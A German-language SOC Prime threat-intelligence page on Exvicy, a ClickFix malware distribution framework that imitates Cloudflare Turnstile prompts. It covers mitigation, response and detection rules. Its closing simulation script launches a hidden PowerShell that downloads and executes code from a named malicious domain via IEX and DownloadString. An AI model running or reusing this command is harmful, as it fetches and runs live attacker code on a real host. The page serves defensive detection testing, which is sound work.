SOC Prime Bias: High

24 Sep 2026 06:51 UTC

Exvicy: Ein Nachahmer des ErrTraffic-Malware-Verteilungsframeworks

Author Photo
SOC Prime Team linkedin icon Folgen
Exvicy: Ein Nachahmer des ErrTraffic-Malware-Verteilungsframeworks
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Exvicy ist ein aufstrebendes Malware-as-a-Service (MaaS) ClickFix Distribution Framework, das in Cybercrime-Foren beworben wird. Es nutzt Social Engineering, indem es Cloudflare Turnstile Herausforderungen imitiert, um Benutzer dazu zu bringen, bösartige PowerShell-Befehle über das Windows-Ausführungsdialogfeld auszuführen. Das Framework kopiert ErrTraffic eng und verwendet große Teile von dessen JavaScript-Codebasis und Verschleierungstechniken.

Untersuchung

TDR-Analysten schwenkten von einem Screenshot eines Administration Panels, das im Exploit.IN-Forum geteilt wurde, um aktive C2-Infrastruktur aufzudecken. Durch die Analyse spezifischer Cloudflare-Nameserver und Domainregistrierungsmuster identifizierten Forscher mehrere bösartige Domains und kompromittierte WordPress-Websites. Technische Analysen bestätigten die umfangreiche Wiederverwendung von ErrTraffic-Code, einschließlich markanter JavaScript-Funktionen und Anti-Analyse-Logik.

Minderung

Organisationen sollten robustes Webfiltering einsetzen, um bekannte bösartige Domains und verdächtige Top-Level-Domains (TLDs), die mit diesen Kampagnen in Verbindung stehen, zu blockieren. Endpunktschutz sollte anomale PowerShell-Ausführungen überwachen und einschränken, insbesondere Befehle, die irm or iex. Benutzer sollten auch darauf trainiert werden, Social-Engineering-Aufforderungen zu erkennen, die sie dazu anweisen, Tastenkombinationen wie Win+R zu verwenden, um Befehle auszuführen.

Antwort

Wenn Exvicy-Aktivität festgestellt wird, sollten betroffene Hosts sofort isoliert werden, um zusätzliche Befehlsausführung oder Payload-Lieferung zu stoppen. Reaktionskräfte sollten PowerShell-Betriebsprotokolle überprüfen, um ausgeführte Befehle und zugehörige Netzwerkverbindungen zu identifizieren. Bekannte C2-IP-Adressen und Domains sollten am Perimeter blockiert werden, gefolgt von einer Durchsuchung nach anderen kompromittierten WordPress-Assets in der Umgebung.

Angriffsverlauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Verdächtiger Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)

SOC Prime Team
23. Sep 2026

Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (via registry_event)

SOC Prime Team
23. Sep 2026

IOC (SourceIP) zur Erkennung: Exvicy: Ein Nachahmer des ErrTraffic-Malware-Distributions-Frameworks

SOC Prime AI Regeln
23. Sep 2026

IOC (DestinationIP) zur Erkennung: Exvicy: Ein Nachahmer des ErrTraffic-Malware-Distributions-Frameworks

SOC Prime AI Regeln
23. Sep 2026

Erkennung bösartiger PowerShell-Befehlsausführung für Exvicy-Malware [Windows-Powershell]

SOC Prime AI Regeln
23. Sep 2026

Exvicy Framework-Befehlsausführung über die Verknüpfung Win + R [Windows-Prozesserstellung]

SOC Prime AI Regeln
23. Sep 2026

Simulationsausführung

  • Angriffserzählung & Kommandos: Ein Angreifer liefert einem Benutzer über Phishing eine bösartige Verknüpfung oder ein Dokument. Bei der Ausführung (T1204.002) löst der Benutzer unwissentlich einen PowerShell-Prozess (T1059.001) aus. Ziel des Angreifers ist es, einen Fuß in der Tür zu bekommen, indem er ein sekundäres Payload herunterlädt. Um das Exvicy-Framework zu imitieren, wird die Befehlszeile so gestaltet, dass sie die spezifische bekannte-bösartige Domain recaptcha-check.com/8E9curHNH8UfAMLz enthält, um den bösartigen Agent herunterzuladen.

  • Regressionstest-Skript:

    # Simulationsskript, um die Exvicy-Erkennungsregel auszulösen.
    # Dies imitiert die Befehlszeilenmuster, die in der Sigma-Regel identifiziert wurden.
    
    $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz"
    $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`""
    
    Write-Host "[+] Starte Simulation: Ausführen von Befehlen, um die Erkennung auszulösen..."
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`""
    Write-Host "[+] Simulationsbefehl gesendet. Überprüfen Sie SIEM auf Warnungen."
  • Bereinigungskommandos:

    # Bereinigung: Durch diese spezielle Simulation werden keine permanenten Dateien erstellt, 
    # aber wir stellen sicher, dass keine verbleibenden PowerShell-Prozesse laufen.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue
    Write-Host "[+] Bereinigung abgeschlossen."